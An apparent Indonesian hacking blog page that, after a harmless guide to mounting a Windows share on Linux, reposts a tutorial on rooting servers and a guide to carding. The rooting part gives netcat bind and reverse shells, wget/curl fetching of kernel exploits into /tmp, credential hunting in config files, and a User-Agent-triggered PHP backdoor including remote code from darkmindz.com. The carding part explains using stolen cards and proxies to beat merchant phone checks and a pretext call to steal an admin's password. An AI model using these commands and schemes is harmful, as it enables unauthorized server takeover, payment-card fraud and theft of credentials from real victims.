ANDROID BANDUNG

All files accessible in a Linux (and UNIX) system are arranged in one big tree, the file hierarchy, rooted at /. These files can be spread out over several devices. The mount command serves to attach the file system found on some device to the big file tree.

Use the mount command to mount remote windows partition or windows share under Linux as follows:

Procedure to mount remote windows partition (NAS share)

1) Make sure you have following information:
=> Windows username and password to access share name
=> Sharename (such as //server/share) or IP address
=> root level access on your Linux system

2) Login to Linux as a root user (or use su command)

3) Create the required mount point:

Code:

[randy@server ~]# mkdir -p /mnt/ntserver

4) Use the mount command as follows:

Code:

[randy@server ~]# mount -t cifs //ntserver/download -o username=admins,password=MyPassword /mnt/ntserver

Use following command if you are using Old version such as RHEL <=4 or Debian <= 3:

Code:

# mount -t smbfs -o username=yourusername,password=Yourpasswd //ntserver/download /mnt/ntserver

5) Access Your Windows 2003/2000/NT share using cd and ls command:

Code:

[randy@server ~]# cd /mnt/ntserver; ls -l

Note:
-t smbfs : File system type to be mount (outdated, use cifs)
-t cifs : File system type to be mount
-o : are options passed to mount command, in this example I had passed two options. First argument is password (vivek) and second argument is password to connect remote windows box
//ntserver/download : Your Windows 2000/NT share name
/mnt/ntserver Linux mount point (to access share after mounting)

Enjoy !!!

[ Gaining Root Access ]
[ The Basics of rooting a server ]

[x] What would I expect from this tutorial?

- This tutorial is to show you the easy ways of gaining root access to a *nix server.
most people think its quiet hard to do so, well I am trying to prove the opposite.

[x] I am interested, go on...

- Okay, you should know atleast some basics of webhacking, to gain access to the server you want to root.
if you have no idea, or never gained access to a server before, I suggest you read some WebHacking tutorials.

I will start with some of the things you need to know in order to start rooting servers::

- Using a shell, have a good background on *nix commands, and know your way around a *nix server.
[ You can learn all that locally, by just installing a *nix distro, and playing around with it. ]
- How to use NetCat, and listen / connect to servers using it.
[ I will cover that in this tutorial ]
- as mentioned earlier, you must have atleast the basics of webhacking covered, how to gain access to a server. etc..
[ Read some WebHacking tutorials, I made a very basic one with alot of examples covering the most used attacking vectors ]

Those are the basic requriements that you should cover before starting reading this tutorial, if you feel you got one missing, lookup some tutorials on it, or you can ask me

[x] How much access you have?

- You cant just root a server if you have a XSS on that server, unless you take that XSS to the extreme and phish with it, but thats another story.
so, we need atleast ability to upload / download / include our code, or even just exeucute it.

Once we got the ability to execute commands on that server, we start checking for things, this is my own checklist that I do on every server. its just a habit now::

Check the /etc/passwd file for the users with SSH access, how do I know which have and which does not?
simple, by using `cat` to get the contents of that file, you will see the users on the server in this form:

user:*:501:502:x:/home/user:/bin/bash
[1] [2] [3]

[1] - The usersname | good for us to know the user to be used on cPanels, FTPs, and SSH...

[2] - Home of that username | good for cross server hacks, where you need to get to that users files.

[3] - Shell access | If it was anything other than :

/bin/sh
/bin/bash
/bin/zsh

Most probably it means no shell / SSH access for that user.

Now, why are we looking for users with SSH access?

Because it would make it much easier to work on that server with SSH access, to execute commands faster etc..

Now lets say the user `user` got SSH access, we can go to his `home` and look for config files, passwords, backups, anything that will have a password.

and then try it on SSH, with the user `user` and the pass that we found, if you are lucky, you will get access

[ Not going to explain what to do next, cause we still need to complete the checklist ]

Allright, so none of the users got SSH access... we cant just give up now can we?

If the hosting company is not that big, or if it was a private server, VPS, dedicated server, most likely the main site of the hosting is on the same server...

that is a great thing to have, so we do a simple WHOIS on the server, and check out the host, and then try to find the home dir...

Now most hosting, will have a billing software, or some system check panels, etc. all of those needs a high user access to the server, so in most cases you will find the password of admin access in plaintext,

we will be looking for config files, how to do so?

well, we moved to the hosts home right, lets check there files...

by listing the files there, we can see they have a folder called `billing`, lets check that out...

the first step, is to get the contents of the index, and look for the included files, most cases its just clear that this file is a config file from the name.

it will be something like:

or or

by getting the contents of that file, we can get the password, and try it on that user, on SSH, cPanel, FTP.

[ No luck... next... ]

The hosting company has there files on another server, there are no backups whatsoever, and you are getting desprete by now...

NetCat comes to the rescue!, NetCat the TCP/IP swiss army knife should be always in your pocket `flash drive or whatever you use`, it is very usefull..

as I promised, I will explain about the usage of NetCat.. so here we go::

[ Windows ]

After downloading NetCat, open up your CMD, and move to the dir that it is located.

The commands you would need are:

nc -vv -l -p 5555

This will make NetCat listen on port 5555, verbosely `telling you exactly what is going on`. that simple eh?

nc -vv -L -p 5555

Same thing, but with a capital L, makes it listen and once disconnected, listen again, and again.. etc...

nc darkmindz.com 80

Connect to darkmindz.com on port 80.

nc -vv -l -p 5555 -e cmd.exe

Okay, you dont want to do that on your own PC, this would listen on port 5555, and once someone connects, it would open up cmd for them...

[ Thats all you need to know about NetCat for now ]

[ *nix ]

Downloaded NetCat, compiled it, and ready to go...

same commands, now the only difference is, since most webservers are *Nix, you will need to use it as a `backdoor`, by using this command:

./nc -vv -l -p 5555 -e /bin/bash

once connected, you got a bash command line on that server

allright, where does that leaves us.. we still need to get a better way to execute commands on the server, and all our trials to get SSH access failed...

Now we are going to move into, Backconnecting and Backdooring...

[ Backconnecting ]

A simple definition would be:

Making the server connect to you.

Limitations:

If the server was firewalled, or had some kind of security against remote connections, you cant use that method...

How-To:

Well, you can code your own backconnector, it is not that hard, if you know C or Perl. but if you dont, you can always use the lots of backconnectors out there.

The most used tool, `atleast by me`, is the iranian backconnnector, and the cyberlab. both are in perl, and both work like a charm.

ofcourse perl should be installed on that server to be able to use those, if perl is installed, all you need to do is::

use NetCat on your PC to listen to a port...

nc -vv -l -p 5555

then, on that server, follow the instructions of your backconnector, most likely it is::

perl dc.pl your_ip_here 5555

if it connected, you will see it on your screen, saying connected, and you can start executing commands

otherwise, you can try a C backconnect tool.. same concept, just compile and run...

[ Backdooring ]

Backdooring, is opening a port on the server, to connect to...

You can use NetCat in this case, and run the command:

./nc -vv -l -p 5555 -e /bin/bash

then connect to the server using NetCat.. done..

or use some bind shells, wont work on alot of servers, they started banning the process... but if it works, great!

[x] So, we have been talking about how to get more access to execute commands all day now, whats next?!

Right, so backups were not found, host is not on the same server, and if it was, all the passwords are either invalid or encrypted.

Now we move into some kernel exploits, and using the server to the max.

atleast by now, you should have a command line access, SSH, Backconnect, Backdoor, whatever it was...

so now you can easily execute commands on the server, but what would you do exactly?

Now its time to get info on the server, kernel, processes, services, and then look for vulnurabilities.

we always start by the kernel, so get the kernel version by:

uname -a

it would output the hostname, OS, and then the kernel version, now we need to find an exploit for that kernel..

a good website for kernel exploits is: http://melol.free.fr/local/

lets say you found the kernel exploit, now we need to run it, how?

lets move to a dir that no one usually look in it, and that is /tmp/.

now, we are going to download that exploit, we can use wget for that:

wget http://melol.free.fr/local/the_name

if it says /bin/wget access denied, dont worry, we can always cURL:

curl http://melol.free.fr/local/the_name -o new_name

if that doesnt work either, remember your shell? well use it to upload that exploit in /tmp/.

now to run it, we first need to give it execution perms, so we chmod it to 777

chmod 777 new_name

allright, now lets hope this works and run it..

./new_name

you can check if it works by checking your id, or whoami, and if it says root. you are good to go

allright, we covered the basic basics of getting root on a server, rooting is not that hard, some attacking methods are hard, like BoF's, you need C knowledge to be able to debug and exploit the processes...

[x] I dont want to loose the root!!

No one does, but alot makes stupid mistakes that will take the root away from them...

Rule #1 and the most important is : You NEVER change the roots pass, NEVER EVER!

Create a new user, with SSH access. check the useradd command for more info.

If you used a local root exploit, make sure you have other copies of it on that server, you might need it again.

Backdoor every single site on the server, with a simple PHP-Shell backdoor:

PHP Code:

= $_SERVER['HTTP_USER_AGENT']; if($config_x == "myb4ckd00r") { @include('http://www.darkmindz.com/shell/x2300.txt '); } ?>

Use bind shell backdoors too.

----------------------------------------------

Ok.. Simple tutorial..its hardly a tutorial.

This is just to people that don't understand what a Phone Verify is.

When you card a shop they sometimes call to verify the order and ask some details about the order and maybe some card details.

How do we do this..

Well there are 2 ways..1 easier then the other.

1. Skype or any other VOIP Provider thats cardable. - Easy
2. Card a Pre-paid Sim and phone. - Hard

We will use 1.

Ok it's pretty easy to card skype just goto it, make an account use socks for the country your going to be using.. so USA = USA socks.

Once you buy $20 credit they will give you a phone number.

Example number 800-675-8734

Now we have a number..all you need now is skype installed on your computer and a mic/headset.

When you card the store try do it in business hours that way the call will come asap and you will get it confirmed and shipped the same day.

So say we carded apple.com for a ipad.

We would get a fresh USA sock and put into the connection settings of skype.

When the order goes through make sure your on skype..leave it on your speakers or headset if your going to be on the computer for a while.

When the call comes through they will ask if your are the card holder, your address etc..and what did you order and what total $$.

Once it's verified they will put the order through.

This is also good for Social Engineering..

If you got information from a server like the admin's user and server information but can't get the password you can whois the site and get the Webserver provider info and then call the admin of the site and say your the tech team and you found out someone has been attacking customer's websites and would like to validate the admin's info..etc..

Then ask for them to change there password and it would be quicker for me to do it on the phone now and more secure just incase someone has put a virus on there site or computer.

When they give you the old password and a new one..login to there server via the web host and change the old to the new so looks legit and like the call was legit.

To make it look even more legit you could send a fake email to there email account under the webservers name and say that there password was changed and thank you for your service and help in the matter.

That's one the easiest ways to root a server

Hope this helps.

Written by Syncorion

ANDROID BANDUNG

468x60 Ads

Cara Deface Melalui CKFinder

Cara DOS & DDOS ala Cracker ( Hacking )

Cara Hack Mematikan Komputer Orang Lain

Cara Deface Web

PEMBUATAN FILE UNTUK DEFACE

PENCARIAN & MENGUMPULKAN INFORMASI KELEMAHAN WEBSITE

PENCARIAN WEBSITE TARGET DI SEARCH ENGINE

EKSEKUSI UPLOAD FILE UNTUK DEFACE

remote windows partition (windows share) under Linux

Basic Of Rooting Linux

phone Verify Social Engineering via Phone to get Admin

Aplikasi pelengkap pada BACKTRACK 5

Visitors

Labels

Translate

Chat Here

Download aplikasi blog ini u/ android